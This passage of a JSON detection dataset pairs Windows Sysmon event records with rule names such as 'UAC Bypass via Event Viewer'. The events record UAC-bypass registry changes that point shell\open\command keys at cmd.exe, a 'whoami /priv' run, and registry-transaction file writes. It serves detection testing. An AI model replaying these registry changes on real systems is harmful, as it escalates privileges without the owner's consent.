Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"c:\\Windows\\System32\\cmd.exe","EventType":"SetValue","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-7D80-5CD5-0000-00100AD01300","ProcessId":2796,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\mscfile\\shell\\open\\command\\(Default)","UtcTime":"2019-05-10 13:32:48.397"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":15676,"Execution":{"#attributes":{"ProcessID":1980,"ThreadID":1948}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-10T13:32:48.412971Z"}},"Version":2}}}},{"detection":["Whoami Execution","Local Accounts Discovery","Run Whoami Showing Privileges"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami /priv","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-79DF-5CD5-0000-0020F8410100","LogonId":"0x141f8","ParentCommandLine":"\"c:\\Windows\\System32\\cmd.exe\" 
","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-7D86-5CD5-0000-0010CC2E1400","ParentProcessId":2076,"ProcessGuid":"365ABB72-7DA9-5CD5-0000-00100ED31400","ProcessId":2524,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-10 13:33:29.409"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":15678,"Execution":{"#attributes":{"ProcessID":1980,"ThreadID":1948}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-10T13:33:29.424885Z"}},"Version":5}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass Using Registry Shell Open Keys","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"c:\\Windows\\SysWOW64\\notepad.exe","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-9DB0-5D46-0000-00108243AF03","ProcessId":3580,"RuleName":"PrivEsc - UAC bypass UACME-45","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\exefile\\shell\\open\\command\\(Default)","UtcTime":"2019-08-04 08:56:16.635"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5664,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-04T08:56:16.650581Z"}},"Version":2}}}},{"detection":["UAC Bypass 
Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.751","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man","UtcTime":"2020-08-25 10:08:05.751"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358988,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:05.763694Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.766","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man.LOG1","UtcTime":"2020-08-25 
10:08:05.766"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358989,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:05.770148Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.766","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man.LOG2","UtcTime":"2020-08-25 10:08:05.766"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358990,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:05.772810Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 
10:08:05.766","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf","UtcTime":"2020-08-25 10:08:05.766"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358991,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:05.776409Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.766","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms","UtcTime":"2020-08-25 10:08:05.766"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358992,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:05.780448Z"}},"Version":2}}}},{"detection":["UAC Bypass 
Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.782","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms","UtcTime":"2020-08-25 10:08:05.782"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358993,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:05.787947Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man","UtcTime":"2020-08-25 
10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359028,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:37.398014Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man.LOG1","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359030,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:37.401175Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 
10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man.LOG2","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359031,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:37.401210Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359032,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:37.401236Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using 
NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359033,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:37.401303Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms","UtcTime":"2020-08-25 
10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359036,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:37.418961Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.579","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.blf","UtcTime":"2020-08-25 10:08:37.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359040,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:37.594123Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.595","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.0.regtrans-ms","UtcTime":"2020-08-25 10:08:37.595"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359041,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:37.610172Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man","UtcTime":"2020-08-25 
10:08:37.673"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359044,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:37.677776Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.673","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\AppData\\Local\\Microsoft\\CLR_v4.0","UtcTime":"2020-08-25 10:08:37.673"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359046,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:37.678592Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.673","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs","UtcTime":"2020-08-25 10:08:37.673"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359047,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:37.678627Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.673","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\TransactionLog.exe.log","UtcTime":"2020-08-25 
10:08:37.673"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359048,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:37.678671Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"(Empty)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-A104-5D46-0000-0010C79CBC03","ProcessId":7312,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\Folder\\shell\\open\\command\\DelegateExecute","UtcTime":"2019-08-04 09:10:28.869"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5696,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-04T09:10:28.893194Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-A104-5D46-0000-001092A6BC03","ProcessId":2576,"RuleName":"PrivEsc - UAC bypass 
UACME-53","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\Folder\\shell\\open\\command\\(Default)","UtcTime":"2019-08-04 09:10:29.025"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5698,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-04T09:10:29.060588Z"}},"Version":2}}}},{"detection":["Sdclt Child Processes"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\control.exe\" /name Microsoft.BackupAndRestoreCenter","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Control Panel","FileVersion":"10.0.17763.1 